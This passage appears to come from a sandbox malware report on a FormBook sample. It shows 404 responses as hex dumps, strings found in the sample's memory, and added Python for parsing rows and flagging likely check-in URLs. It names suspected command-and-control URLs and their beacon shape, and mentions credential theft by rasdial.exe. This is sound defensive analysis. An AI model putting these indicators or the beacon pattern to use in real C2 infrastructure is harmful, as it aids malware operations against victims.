22 74 61 72 67 65 74 Data Ascii: 11353 <!DOCTYPE html> <html lang="de-DE"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta name='robots' content='noindex, follow' /> <!-- This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta property="og:locale" content="de_DE" /> <meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich – Art, Design, Care" /> <meta property="og:site_name" content="Anai Dittrich – Art, Design, Care" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich – Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:55:48 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 Data Ascii: 11353 <!DOCTYPE html> <html lang="de-DE"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta name='robots' content='noindex, follow' /> <!-- This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta property="og:locale" content="de_DE" /> <meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich – Art, Design, Care" /> <meta property="og:site_name" content="Anai Dittrich – Art, Design, Care" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich – Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:55:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 Data Ascii: 11353 <!DOCTYPE html> <html lang="de-DE"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta name='robots' content='noindex, follow' /> <!-- This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta property="og:locale" content="de_DE" /> <meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich – Art, Design, Care" /> <meta property="og:site_name" content="Anai Dittrich – Art, Design, Care" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich – Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target
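            The eight responses above arrive within about thirty seconds and every one is a 404, but from three different hosting stacks: an nginx/1.20.1 host at 11:55:18, four replies from a ddos-guard front end whose cookie is scoped to .ayypromo.shop between 11:55:32 and 11:55:40, and three replies from an Apache/WordPress site (anaidittrich.com) between 11:55:46 and 11:55:51. That shape, a sample walking a list of candidate domains and collecting error pages, is consistent with the FormBook verdict in this report; the string http://www.anaidittrich.com/qpwk/ further down ties the Apache replies to a short check-in path. The report fuses the response headers into one run of text and gives the body only as a hex dump, so the following Python, an added example rather than any part of Joe Sandbox or of this report, parses such a row back into a status line, a header map and a decoded body and pulls out the fields a triage note needs (Server, cookie domain, page title). The header-name list is an assumption limited to the names seen on this page, and the three sample rows are constructed here with the real headers but shortened bodies.

```python
import re
from dataclasses import dataclass, field

# Header names that occur in the fused header blob of a Joe Sandbox
# "HTTP traffic detected" row (assumption: only the names seen in this report).
# The report concatenates header lines with no separator, so the only reliable
# split point is "<KnownName>: ".
HEADER_NAMES = (
    "Server", "Date", "Content-Type", "Content-Length", "Connection", "ETag",
    "Set-Cookie", "Last-Modified", "Accept-Ranges", "X-Frame-Options",
    "Expires", "Cache-Control", "Link", "Upgrade", "Transfer-Encoding",
)
_SPLIT_RE = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))
_STATUS_RE = re.compile(r"^HTTP/1\.[01] (\d{3}) (.*)$")
_TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)
_CHUNK_RE = re.compile(rb"^[0-9A-Fa-f]+\r\n")   # leading chunk-size line of a chunked body


@dataclass
class HttpRow:
    status: int
    reason: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""

    @property
    def server(self):
        return self.headers.get("Server", "")

    @property
    def cookie_domain(self):
        m = re.search(r"Domain=([^;]+)", self.headers.get("Set-Cookie", ""))
        return m.group(1) if m else ""

    @property
    def title(self):
        m = _TITLE_RE.search(self.body.decode("utf-8", "replace"))
        return " ".join(m.group(1).split()) if m else ""


def parse_http_row(line):
    """Parse one 'HTTP traffic detected' row: status line, headers, decoded body."""
    marker = "HTTP traffic detected: "
    start = line.index(marker) + len(marker)
    raw_at = line.index("Data Raw: ", start)
    blob = line[start:raw_at]
    hex_part = line[raw_at + len("Data Raw: "):]
    ascii_at = hex_part.find("Data Ascii:")      # some rows append a text rendering
    if ascii_at != -1:
        hex_part = hex_part[:ascii_at]
    pieces = _SPLIT_RE.split(blob)               # first piece is the status line
    m = _STATUS_RE.match(pieces[0])
    if not m:
        raise ValueError("no status line in: %r" % pieces[0])
    row = HttpRow(status=int(m.group(1)), reason=m.group(2))
    for piece in pieces[1:]:
        name, _, value = piece.partition(": ")
        row.headers[name] = value
    body = bytes.fromhex(hex_part)               # fromhex skips the spaces
    if row.headers.get("Transfer-Encoding") == "chunked":
        body = _CHUNK_RE.sub(b"", body, count=1)  # drop the chunk-size prefix
    row.body = body
    return row


def summarize(lines):
    """One tuple per row: (server, status, cookie domain, page title)."""
    out = []
    for line in lines:
        r = parse_http_row(line)
        out.append((r.server, r.status, r.cookie_domain, r.title))
    return out


def _row(headers_blob, body, data_ascii=False):
    """Build a report-style row from a fused header blob and a body (constructed sample)."""
    line = "Source: global trafficHTTP traffic detected: " + headers_blob
    line += "Data Raw: " + body.encode("utf-8").hex(" ")
    if data_ascii:
        line += " Data Ascii: " + " ".join(body.split())
    return line


# Constructed sample rows: headers copied from the report above, bodies shortened.
SAMPLE_ROWS = [
    _row('HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:18 GMT'
         'Content-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"',
         '<html><head><title>The page is not found</title></head></html>'),
    _row('HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=65GLpdxqIKUfNDXLufSr; '
         'Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:32 GMT'
         'Date: Tue, 03 Sep 2024 11:55:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 738',
         '<html>\n    <head>\n        <title>404 Page Not Found.</title>\n    </head>\n</html>\n',
         data_ascii=True),
    _row('HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:55:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMT'
         'Cache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"'
         'Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8',
         '11353\r\n<!DOCTYPE html>\n<html lang="de-DE">\n<head><title>Seite wurde nicht gefunden.</title></head></html>'),
]

if __name__ == "__main__":
    for server, status, domain, title in summarize(SAMPLE_ROWS):
        print(server, status, domain or "-", title, sep=" | ")
```

            Splitting on known header names is the only safe option because values such as the Link and Set-Cookie headers legitimately contain colons and commas; a header the list does not know about simply stays glued to the value before it, which is visible in the output rather than silently misparsed. The chunk-size prefix is stripped only when Transfer-Encoding says chunked, so the nginx and ddos-guard bodies are left untouched.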
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003724000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005414000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.0000000038524000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004222000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anaidittrich.com
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anaidittrich.com/qpwk/
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004222000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005D80000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000003.2170716950.0000000007D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004546000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000006236000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
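            The URLs in the rows above fall into a few groups that deserve different handling. The mgmasistencia.com theme assets, feeds and WordPress links are the body of a 404 page the sample received and kept in memory, and the cpanel.com, nginx.net and redhat.com links are the same kind of residue from default error pages. The search-engine template URLs (ecosia, duckduckgo, ch.search.yahoo.com, each ending in an empty q= or command= parameter) and the login.live.com endpoints appear only in rasdial.exe, the process this report also flags for browser and mail credential access, and match the shape of browser profile data rather than of anything the sample requests. Only two strings have the shape commonly reported for FormBook check-ins, a single short alphanumeric directory and, for GET beacons, two short query parameters: http://www.anaidittrich.com/qpwk/ and http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54. The following Python is an added example, not part of Joe Sandbox or of this report, that parses rows of this form, groups the URLs by host and applies that heuristic at host level: a host is promoted to C2 candidate only if it is never seen with anything other than a short path or its bare root, so a site like mgmasistencia.com, whose /blog/ would match on its own, is demoted by its theme assets. The class names, the path and search-template patterns and the sample rows (memory-region identifiers shortened) are all assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample rows in the shape of the report's "String found in binary
# or memory" entries (memory-region identifiers shortened for readability).
SAMPLE_ROWS = [
    "Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.sdmp, rasdial.exe, "
    "00000006.00000002.3531860991.0000000005738000.sdmpString found in binary or memory: "
    "http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4",
    "Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.sdmp, rasdial.exe, "
    "00000006.00000002.3531860991.0000000005738000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/",
    "Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.sdmpString found in binary or memory: "
    "http://www.anaidittrich.com",
    "Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.sdmpString found in binary or memory: "
    "http://www.anaidittrich.com/qpwk/",
    "Source: rasdial.exe, 00000006.00000002.3531860991.0000000005D80000.sdmpString found in binary or memory: "
    "http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54",
    "Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.sdmpString found in binary or memory: "
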